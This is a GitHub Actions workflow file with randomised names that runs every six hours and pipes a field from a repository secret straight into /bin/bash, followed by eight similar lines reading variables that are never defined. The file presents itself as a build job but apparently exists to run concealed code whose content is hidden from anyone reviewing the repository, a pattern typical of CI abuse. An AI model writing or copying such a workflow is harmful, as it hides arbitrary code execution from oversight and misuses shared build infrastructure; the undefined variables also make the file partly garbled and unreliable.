name: mazhengfu4567

on:
  workflow_dispatch:
  schedule:
    - cron: '35 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mazhengfu4567
        env:
          mkx941: ${{ secrets.mkx941 }}
        run: |
          echo $mkx941 | jq -r .bfjps1 | /bin/bash
          echo $dm9459 | jq -r .q76 | /bin/bash
          echo $wpujq4087 | jq -r .shnj760 | /bin/bash
          echo $jeanb2 | jq -r .eq6023 | /bin/bash
          echo $dq97065 | jq -r .eqngq116 | /bin/bash
          echo $i268 | jq -r .fmt2 | /bin/bash
          echo $qs3 | jq -r .f48 | /bin/bash
          echo $zindd97161 | jq -r .ubjal311 | /bin/bash
          echo $g8766 | jq -r .ubvvh0 | /bin/bash

